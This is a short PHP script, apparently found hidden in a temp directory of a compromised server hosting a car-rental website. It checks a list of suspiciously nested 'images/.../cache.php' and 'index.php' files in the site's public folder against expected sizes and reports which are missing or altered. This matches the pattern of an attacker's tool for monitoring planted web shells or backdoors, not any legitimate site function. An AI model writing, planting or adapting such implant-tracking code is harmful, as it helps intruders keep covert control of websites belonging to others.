File: //proc/self/root/tmp/.reference
<?php $r = '/home/burhbrzf/burhanrentacar.net/rental/rental/public'; $x = ["/images/images/images/index.php"=>"bd@@419662@@41",
"/images/images/images/images/cache.php"=>"bd@@419673@@68",
"/images/images/cache.php"=>"bd@@430726@@53",
"/images/images/images/images/images/cache.php"=>"bd@@430759@@29",
"/images/images/index.php"=>"bd@@419019@@41",
"/images/images/images/images/index.php"=>"bd@@419645@@31",
"/images/images/images/cache.php"=>"bd@@419651@@100"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');